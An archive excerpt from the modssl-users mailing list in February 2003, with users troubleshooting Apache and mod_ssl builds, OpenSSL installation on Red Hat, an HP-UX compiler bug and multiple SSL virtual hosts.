	for ; Mon, 10 Feb 2003 09:47:31 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: RE: cgi-bin broken lock
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Date: Mon, 10 Feb 2003 09:47:31 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: cgi-bin broken lock
Thread-Index: AcLQr1ZOCXwJ/n+rSCWIYtvgbie4JgAMZ5vA
Importance: normal
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Is any content on the page non-secure? (i.e. all img tags have to be
https too).

Rgds,
Owen Boyle

>-----Original Message-----
>From: Jan Cohen [mailto:familyforever@mindspring.com]
>Sent: Montag, 10. Februar 2003 03:50
>To: modssl-users@modssl.org
>Subject: cgi-bin broken lock
>
>
>Hi all,
>
>I've got ssl up and running on a test page that calls a script 
>in cgi-bin.
>Lock is there, everything works.  When I parse the info from 
>that page to a
>script in the cgi-bin, that script creates the https page and 
>some of the
>ssl functionality seems to work (at least the page is being created).
>Unfortunately, the script creates a page with a broken lock and I can't
>figure out why.
>
>I don't have access to the httpd.conf, but my host tells me 
>ssl is enabled
>for the root dn, and that the cgi-bin was added to the ssl 
>section of the
>httpd.conf.  Would anyone have some suggestions I might be 
>able to check
>out?
>
>Thanks for your help,
>
>Jan Cohen
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 10 12:20:55 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 572442AA0B4; Mon, 10 Feb 2003 12:20:55 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id AB5232AA087
	for ; Mon, 10 Feb 2003 12:20:53 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h1ABQ3106803
	for ; Mon, 10 Feb 2003 11:26:27 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <1TVXBY1B>; Mon, 10 Feb 2003 11:20:08 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2679@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Problems compiling mod_ssl with apache 2.0.44
Date: Mon, 10 Feb 2003 11:20:06 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Geoff Thorpe [mailto:geoff@geoffthorpe.net]
> Sent: 08 February 2003 18:08
> To: modssl-users@modssl.org
> Subject: Re: Problems compiling mod_ssl with apache 2.0.44
> 
> 
> * Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
> > Ok, I have found the problem. If you want to have files in the same
> > directories as original instalation of RH8 you have to use "./config
> > --prefix=/usr". Sorry for that confusion. It is the 
> distribution which
> > is strange.
> 
> Phew, I was starting to wonder what I was missing here :-) As I
> mentioned originally, using "/usr/include" as an installation prefix
> doesn't make sense because it will create the standard 
> {include,bin,man}
> tree beneath that and install. Hence "/usr" or "/usr/local" make more
> sense. Also, especially on package management systems like RH, you're
> better not to simply install *over* existing files, particularly as a
> newer version of openssl may have removed headers that were in a
> previous version, so the old ones will end up mixed up with the new
> ones. And of course if a bug-fix release is made by RH to the older
> version, eg. 0.9.6x, that could seriously screw things up if you'd
> installed 0.9.7 over the top. It could also totally mangle 
> your system's
> RPM database, and various other carnage is possible.
> 
> The solution is to either grapple with RH's dependencies to try and
> build a replacement openssl RPM from source to upgrade to (which many
> will tell you is an only slightly less difficult problem than the
> alchemy of gold itself) or to install openssl elsewhere and make sure
> your system paths are organised appropriately. Eg. you could use
> /usr/local or /opt as a place to manually install packages such as a
> newer openssl, and make sure that the bin subdirectory is earlier in
> PATH than /usr/bin, ditto for the lib subdirectory in /etc/ld.so.conf,
> the man subdirectory in /etc/man.config, and so on ...
> 
Actually, it shouldn't make any difference to the installed RPM of
openssl-0.9.6b, provided that /usr/bin/openssl isn't overwritten. The
quickest way to check is with "rpm -V openssl", which should return no
response. All your other points above are valid though. It is probably best
though to put newer stuff for Red Hat under /usr/local so you don't break
anything installed.

Now, upgrading openssl-0.9.6 on a Red Hat box (7.0-8.0 inclusive) will screw
things up  bigtime (see the specific section in the openssl FAQ).

If there's sufficient demand I'll make up an openssl 0.9.7 RPM for RedHat
users. So far no-one has asked...

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Am I the only person in the UK who finds it strange that our Prime Minister
complains of Human Rights abuses around the world, yet wishes to opt out of
the European Convention of Human Rights?

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 10 15:49:25 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F25772AA0B3; Mon, 10 Feb 2003 15:49:24 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ZACTN02002.vodacom.corp (vodactmail2.vodacom.co.za [196.6.129.70])
	by master.modssl.org (Postfix) with SMTP id 50BA82AA065
	for ; Mon, 10 Feb 2003 15:49:14 +0100 (CET)
Received: FROM zamdh02002.vodacom.corp BY ZACTN02002.vodacom.corp ; Mon Feb 10 10:37:33 2003 +0200
Received: from zamdh02001.vodacom.corp ([10.111.7.52]) by zamdh02002.vodacom.corp with Microsoft SMTPSVC(5.0.2195.5329);
	 Mon, 10 Feb 2003 10:37:32 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: Compiling mod_ssl as a DSO for Apache 1.3.12
Date: Mon, 10 Feb 2003 10:37:32 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Compiling mod_ssl as a DSO for Apache 1.3.12
Thread-Index: AcLQ3+DDNINAlTzQEdeJlwAAhiCBXQ==
From: "Simon Donally" 
To: 
X-OriginalArrivalTime: 10 Feb 2003 08:37:32.0553 (UTC) FILETIME=[A774CF90:01C2D0DF]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Simon Donally" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi List Users

I am trying to compile Apache with mod_ssl as a DSO, I'm using a =
relatively old version of Apache software as this particular version =
functions without errors on the system. The software versions are listed =
below

Solaris 2.6
Apache 1.3.12
Modssl 2.6.6

I have read numerous articles on the internet concerning this procedure =
and have followed all the necessary steps, this has taken about a week =
and I still cannot get Apache to start without error when I use the =
apachectl startssl command.

1)	I compile openssl 0.9.6b as follows
a.	make clean
b.	make test
c.	make build-shared

		This creates libssl.so, libssl.so.0 and libssl.so.0.9.6

2)	I configure mod-ssl as follows
a.	./configure \
				--with-apache =3D/home/simon/apache_1.3.12 \
				--with-ssl       =3D/home/simon/Openssl_0.9.6b/openssl_0.9.6b \
				--prefix          =3D/home/simon/Apache12SO \
				--enable-module=3Dssl

3)	I compile Apache
a.	make
b.	make certificate
c.	make install

I obtain the following errors


A)	Using the version of libssl.so created by compiling Apache, this is =
smaller than the libssl.so.0.9.6 created by modssl, and when loaded =
complains of unresolved symbols

bash-2.02$ apachectl startssl

Syntax error on line 208 of /home/simon/Apache12SO/conf/httpd.conf:

Cannot load /home/simon/Apache12SO/libexec/libssl.so into server: =
ld.so.1
: /home/simon/Apache12SO/bin/httpd: fatal: relocation error: file =
/home/simon/Apache12SO/libexec/libssl.so: symbol ap_user_id: referenced =
symbol not found
.//apachectl startssl: httpd could not be started


B)	Removing /usr/local/ssl/libfrom LD_LIBRARY_PATH

bash-2.02$ echo $LD_LIBRARY_PATH

/home/simon/Apache12SO/libexec:/usr/X/lib:/usr/openwin/lib:/usr/dt/lib:/o=
racle/oracle816/lib:/opt/ALCHTS/j2sdk1_3_1_01/lib:/usr/java1.1/lib:
/opt/htuser/ALCHTS/bin/openldap/lib:/opt/htuser/ALCHTS/bin/apache/libexec=
:/usr/ucblib:/oracle/oracle816/jre/1.1.8/lib

bash-2.02$ apachectl startssl

Syntax error on line 208 of /home/simon/Apache12SO/conf/httpd.conf:
Cannot load /home/simon/Apache12SO/libexec/libssl.so into server: =
ld.so.1: /home/simon/Apache12SO/bin/httpd: fatal: libcrypto.so.0.9.6: =
open failed: No such file or directory
.//apachectl startssl: httpd could not be started
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 10 15:59:39 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8110B2AA0B4; Mon, 10 Feb 2003 15:59:39 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ZACTN02002.vodacom.corp (vodactmail2.vodacom.co.za [196.6.129.70])
	by master.modssl.org (Postfix) with SMTP id D87A02AA087
	for ; Mon, 10 Feb 2003 15:59:36 +0100 (CET)
Received: FROM zamdh02002.vodacom.corp BY ZACTN02002.vodacom.corp ; Mon Feb 10 14:08:42 2003 +0200
Received: from zamdh02001.vodacom.corp ([10.111.7.52]) by zamdh02002.vodacom.corp with Microsoft SMTPSVC(5.0.2195.5329);
	 Mon, 10 Feb 2003 14:08:40 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: Compiling mod_ssl as a DSO
Date: Mon, 10 Feb 2003 14:08:40 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Compiling mod_ssl as a DSO
Thread-Index: AcLQ/SvTNINA1TzQEdeJlwAAhiCBXQ==
From: "Simon Donally" 
To: 
X-OriginalArrivalTime: 10 Feb 2003 12:08:40.0753 (UTC) FILETIME=[264ABA10:01C2D0FD]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Simon Donally" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi List Users

I am trying to configure Apache to run with ModSSL as a DSO. I am using =
relatively old versions of software as this particular version of Apache =
 functions on the system. The software versions are as follows

	Apache 1.3.12
	Openssl_0.9.6b
	Modssl_2.6.6

I have read numerous articles both from the list forum and from articles =
found from internet searches. I have tried many options to configure =
Apache to run with SSL as a DSO over a period of a week and to date have =
not been successful.

I have listed the errors I obtain and the steps I follow to compile =
Apache. I would be most grateful for any advice which may lead to the =
resolution of this problem.

1)	Compile OpenSSL 0.9.6b as a shared object as follows
a.	make clean
b.	make test
c.	make build-shared

2)	./configure \
			--enable-module=3Dso
			--with-apache=3D/home/sxxx/apache_1.3.12 \
			--with-ssl=3D/home/simon/Openssl-0.9.6b/openssl-0.9.6b \
			--prefix=3D/home/simon/Apache12SO \
			--enable-module=3Dssl

3)	cd /home/sxxx/apache_1.3.12

			make
			make certificate
			make install

4)	The entry in the httpd.conf file is as follows=20
			
			LoadModule ssl_module   libexec/libssl.so
			

*	This is the first error I obtain

hometop1% apachectl startssl
Syntax error on line 208 of /home/simon/Apache12SO/conf/httpd.conf:
Cannot load /home/simon/Apache12SO/libexec/libssl.so into server: =
ld.so.1: /home/simon/Apache12SO/bin/httpd: fatal: libssl.so.0.9.6: open =
failed: No such file or directory
.//apachectl startssl: httpd could not be started

This is resolved by setting the LD_LIBRARY_PATH variable to =
/usr/local/ssl/lib
				bash-2.02$ export =
LD_LIBRARY_PATH:/usr/local/ssl/lib:$LD_LIBRARY_PATH


*	This is the next error I obtain after having set the LD_LIBRARY_PATH =
variable to=20
				bash-2.02$ apachectl startssl

Syntax error on line 208 of /home/simon/Apache12SO/conf/httpd.conf:
Cannot load /home/simon/Apache12SO/libexec/libssl.so into server: =
ld.so.1
: /home/simon/Apache12SO/bin/httpd: fatal: relocation error: file =
/home/simon/Apache12SO/libexec/libssl.so: symbol ap_user_id: referenced =
symbol not found
.//apachectl startssl: httpd could not be started


The next step I tried was=20
*	To directly copy libssl.so from Openssl to libexec using libssl.so =
from Openssl
*	To set the library path to point to /home/simon/Apache12SO/libexec =
only

bash-2.02$ pwd
/reserv/home/simon/Apache12SO/libexec
bash-2.02$ ls -lisa
total 2472
    118879    2 drwxr-xr-x   2 simon    htgroup      512 Feb 10 09:03 .
    420694    2 drwxrwxr-x  12 simon    htgroup      512 Feb  6 16:43 ..
    118881   16 -rw-r--r--   1 simon    htgroup     8153 Feb  7 10:57 =
httpd.exp
    118893    2 lrwxrwxrwx   1 simon    htgroup       11 Feb 10 09:03 =
libssl.so -> libssl.so.0
    118888    2 lrwxrwxrwx   1 simon    htgroup       15 Feb 10 09:03 =
libssl.so.0 -> libssl.so.0.9.6
    118886 1920 -rwxrwxr-x   1 simon    htgroup   970983 Feb  7 12:45 =
libssl.so.0.9.6
    118890  528 -rwxr-xr-x   1 simon    htgroup   256259 Feb  7 10:57 =
libssl.so.old

This didn't work either and generated the following error, I notice that =
the file libssl.so.old generated when Apache was compiled is =
considerably smaller than the file libssl.so.0.9.6 copied from OpenSSL

Syntax error on line 208 of /home/simon/Apache12SO/conf/httpd.conf:
Can't locate API module structure `ssl_module' in file =
/home/simon/Apache12SO/libexec/libssl.so: ld.so.1: =
/home/simon/Apache12SO/bin/httpd: fatal: ssl_module: can't find symbol
.//apachectl startssl: httpd could not be started

regards

Simon Donally
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 10 16:46:29 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E4D842AA0B3; Mon, 10 Feb 2003 16:46:28 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 1B7832AA065
	for ; Mon, 10 Feb 2003 16:46:27 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h1AFkPFY003307
	for ; Mon, 10 Feb 2003 16:46:25 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h1AFkM2M025197
	for ; Mon, 10 Feb 2003 16:46:23 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: RE: Compiling mod_ssl as a DSO
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Date: Mon, 10 Feb 2003 16:46:22 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Compiling mod_ssl as a DSO
Importance: normal
Thread-Index: AcLQ/SvTNINA1TzQEdeJlwAAhiCBXQAG0CKw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just to get things clear, openSSL is a library of functions which is
used by (among other things) mod_ssl. So mod_ssl needs to know about
openSSL but openSSL doesn't care which application is using it. Your
installation paths are a bit idiosyncratic, which is OK as long as you
have a clear idea about how everything is inter-related. I was a bit
confused reading your posting so I'm suspecting apache is too.

Generally, you should proceed as follows (if any of this strikes you as
odd, then that might be the problem):

- Install openSSL in /path/to/ssl
- set SSL_BASE = /path/to/ssl
- set LD_RUN_PATH = /usr/lib:/usr/local/lib:/path/to/ssl/lib (this
avoids using LD_LIBRARY_PATH)
- Unpack apache tar file in (e.g.) /tmp/apache
- Unpack mod_ssl tar file in (e.g. /tmp/mod_ssl
- in /tmp/mod_ssl, run "./configure --with-apache=/tmp/apache" (this
patches apache sources)
- in /tmp/apache, run "./configure "--prefix=/path/to/apache \
 --enable-module=so \
--enable-shared=ssl \
--enable-module=ssl
- make, make install

This should leave libssl.so in /path/to/apache/libexec and
/path/to/apache/bin/httpd should start without $LD_LIBRARY_PATH being
set.

Rgds,

Owen Boyle

PS - your versions are ancient... Are you sure the latest versions won't
work? On the other hand, your versions are so old that 

  

>-----Original Message-----
>From: Simon Donally [mailto:simon.donally@vcontractor.co.za]
>Sent: Montag, 10. Februar 2003 13:09
>To: modssl-users@modssl.org
>Subject: Compiling mod_ssl as a DSO
>
>
>Hi List Users
>
>I am trying to configure Apache to run with ModSSL as a DSO. I 
>am using relatively old versions of software as this 
>particular version of Apache  functions on the system. The 
>software versions are as follows
>
>	Apache 1.3.12
>	Openssl_0.9.6b
>	Modssl_2.6.6
>
>I have read numerous articles both from the list forum and 
>from articles found from internet searches. I have tried many 
>options to configure Apache to run with SSL as a DSO over a 
>period of a week and to date have not been successful.
>
>I have listed the errors I obtain and the steps I follow to 
>compile Apache. I would be most grateful for any advice which 
>may lead to the resolution of this problem.
>
>1)	Compile OpenSSL 0.9.6b as a shared object as follows
>a.	make clean
>b.	make test
>c.	make build-shared
>
>2)	./configure \
>			--enable-module=so
>			--with-apache=/home/sxxx/apache_1.3.12 \
>			
>--with-ssl=/home/simon/Openssl-0.9.6b/openssl-0.9.6b \
>			--prefix=/home/simon/Apache12SO \
>			--enable-module=ssl
>
>3)	cd /home/sxxx/apache_1.3.12
>
>			make
>			make certificate
>			make install
>
>4)	The entry in the httpd.conf file is as follows 
>			
>			LoadModule ssl_module   libexec/libssl.so
>			
>
>*	This is the first error I obtain
>
>hometop1% apachectl startssl
>Syntax error on line 208 of /home/simon/Apache12SO/conf/httpd.conf:
>Cannot load /home/simon/Apache12SO/libexec/libssl.so into 
>server: ld.so.1: /home/simon/Apache12SO/bin/httpd: fatal: 
>libssl.so.0.9.6: open failed: No such file or directory
>.//apachectl startssl: httpd could not be started
>
>This is resolved by setting the LD_LIBRARY_PATH variable to 
>/usr/local/ssl/lib
>				bash-2.02$ export 
>LD_LIBRARY_PATH:/usr/local/ssl/lib:$LD_LIBRARY_PATH
>
>
>*	This is the next error I obtain after having set the 
>LD_LIBRARY_PATH variable to 
>				bash-2.02$ apachectl startssl
>
>Syntax error on line 208 of /home/simon/Apache12SO/conf/httpd.conf:
>Cannot load /home/simon/Apache12SO/libexec/libssl.so into 
>server: ld.so.1
>: /home/simon/Apache12SO/bin/httpd: fatal: relocation error: 
>file /home/simon/Apache12SO/libexec/libssl.so: symbol 
>ap_user_id: referenced symbol not found
>.//apachectl startssl: httpd could not be started
>
>
>The next step I tried was 
>*	To directly copy libssl.so from Openssl to libexec 
>using libssl.so from Openssl
>*	To set the library path to point to 
>/home/simon/Apache12SO/libexec only
>
>bash-2.02$ pwd
>/reserv/home/simon/Apache12SO/libexec
>bash-2.02$ ls -lisa
>total 2472
>    118879    2 drwxr-xr-x   2 simon    htgroup      512 Feb 10 09:03 .
>    420694    2 drwxrwxr-x  12 simon    htgroup      512 Feb  
>6 16:43 ..
>    118881   16 -rw-r--r--   1 simon    htgroup     8153 Feb  
>7 10:57 httpd.exp
>    118893    2 lrwxrwxrwx   1 simon    htgroup       11 Feb 
>10 09:03 libssl.so -> libssl.so.0
>    118888    2 lrwxrwxrwx   1 simon    htgroup       15 Feb 
>10 09:03 libssl.so.0 -> libssl.so.0.9.6
>    118886 1920 -rwxrwxr-x   1 simon    htgroup   970983 Feb  
>7 12:45 libssl.so.0.9.6
>    118890  528 -rwxr-xr-x   1 simon    htgroup   256259 Feb  
>7 10:57 libssl.so.old
>
>This didn't work either and generated the following error, I 
>notice that the file libssl.so.old generated when Apache was 
>compiled is considerably smaller than the file libssl.so.0.9.6 
>copied from OpenSSL
>
>Syntax error on line 208 of /home/simon/Apache12SO/conf/httpd.conf:
>Can't locate API module structure `ssl_module' in file 
>/home/simon/Apache12SO/libexec/libssl.so: ld.so.1: 
>/home/simon/Apache12SO/bin/httpd: fatal: ssl_module: can't find symbol
>.//apachectl startssl: httpd could not be started
>
>regards
>
>Simon Donally
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 10:34:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 956002AA048; Wed, 19 Feb 2003 10:34:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id BFE872AA127; Thu, 13 Feb 2003 16:06:30 +0100 (CET)
Received: from jake.micromuse.co.uk (mailhost.micromuse.com [194.131.185.75])
	by master.modssl.org (Postfix) with ESMTP id ECD0A2AA08B
	for ; Tue,  4 Feb 2003 13:03:24 +0100 (CET)
Received: from micromuse.com ([192.168.39.181])
	by jake.micromuse.co.uk (Switch-2.1.0/Switch-2.1.0) with ESMTP id h14C1YQ27430
	for ; Tue, 4 Feb 2003 12:01:34 GMT
Message-ID: <3E3FAB7B.2050000@micromuse.com>
Date: Tue, 04 Feb 2003 12:00:59 +0000
From: Stuart Cook 
Organization: Miucromuse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.2) Gecko/20021120 Netscape/7.01
X-Accept-Language: en, en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Preprocessor bug in ssl_exp_scan.l when building with native compiler
 on HP-UX 11
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Stuart Cook 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have been building Apache 1.3.27 on HP-UX 11 via the native compiler 
with Mod SSL 2.8.12-1.3.27 and have come across and resolved a build bug 
during the Apache compilation process.

In the Mod SSL file .../pkg.sslmod/ssl_expr_scan.l from line 91 onwards 
there is a state variable 'str'.  The native C pre-processor converts 
this to 1 and errors with:

/opt/ansic/bin/cc -c  -I../../os/unix -I../../include   -DHPUX11 -Aa -Ae 
-D_HPUX_SOURCE -DMOD_SSL=208112 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT 
-I../../lib/expat-lite `../../apaci` -DSSL_COMPAT -DSSL_ENGINE 
-I/build/reporter/apache/openssl-engine-0.9.6g/include 
-DMOD_SSL_VERSION=\"2.8.12\" ssl_expr_scan.c
cc: "lex.ssl_expr_yy.c", line 1753: error 1000: Unexpected symbol: "1".
cc: "lex.ssl_expr_yy.c", line 1760: error 1720: Subscript expression 
must combine object pointer and integer.
cc: "lex.ssl_expr_yy.c", line 1760: error 1566: Test expression in for 
must be scalar.
cc: "lex.ssl_expr_yy.c", line 1763: warning 527: Integral value 
implicitly converted to pointer in assignment.
cc: "lex.ssl_expr_yy.c", line 1763: warning 563: Argument #1 is not the 
correct type.
*** Error exit code 1

This can be resolved by changing .../pkg.sslmod/ssl_expr_scan.l state 
variable to 'str_state' or some other value than 'str'.

Once this change is made, the apache web server correctly and 
successfully compiles.

Stuart

-- 
--------------------------------------------
  Stuart V Cook BSc. (Hons)
  Senior Software Consultant - Micromuse Ltd.
  90 Putney Bridge Rd, London. SW18 1DA. UK
  Office: +44-(0)20-8875 9500 x734
  Mobile: +44-(0)7771 816 472
--------------------------------------------
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 10:34:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B34282AA04B; Wed, 19 Feb 2003 10:34:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 4FA172AA133; Thu, 13 Feb 2003 16:07:42 +0100 (CET)
Received: from mail.pirk.com (node-423a4b7a.sna.onnet.us.uu.net [66.58.75.122])
	by master.modssl.org (Postfix) with ESMTP id 2E2572AA0A5
	for ; Thu,  6 Feb 2003 02:01:04 +0100 (CET)
Received: from mail.pirk.com (IDENT:1000@localhost [127.0.0.1])
	by mail.pirk.com (8.12.4/8.12.0.Beta19) with ESMTP id h1611b7J017931
	for ; Wed, 5 Feb 2003 17:01:37 -0800
Received: from localhost (orion@localhost)
	by mail.pirk.com (8.12.4/8.12.0.Beta19/Submit) with ESMTP id h1611aY6017928
	for ; Wed, 5 Feb 2003 17:01:37 -0800
X-Authentication-Warning: mail.pirk.com: orion owned process doing -bs
Date: Wed, 5 Feb 2003 17:01:36 -0800 (PST)
From: Steve Pirk 
X-X-Sender: orion@mail.pirk.com
To: modssl-users@modssl.org
Subject: Multiple SSL VirtualHosts in apache
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Pirk 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I check the mail archives, but could not find a good
answer for this "problem" I am having.

I am building out a dev environment using apache
on Solaris. The dev environment needs to run under
SSL (to simulate the production environment). I am
starting with 4 virtual servers. They all use the
same cert file, but are on different ports.

The problem I am running into is that only the "first"
VirtualHost works. Requests to subsequent ports result
in a mod_ssl:error:HTTP-request error. Here is the error_log
entry:

[Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL handshake failed: HTTP
spoken on HTTPS port; trying to send HTML error page (OpenSSL library
error follows)
[Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking HTTP to HTTPS
port!?]

This is being used in conjunction with an auth package,
but the redirect after logging in is https://

Does anyone knnow of a good way to have multiple
SSL virtual servers on one apache instance?

Here is a sample of httpd.conf. In this case, port 7000
works, but 7001 and 7002 get the mod_ssl error.

  
    DocumentRoot        /some/doc/root
    SSLEngine on
    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
  

  
    DocumentRoot        /some/doc/root
    SSLEngine on
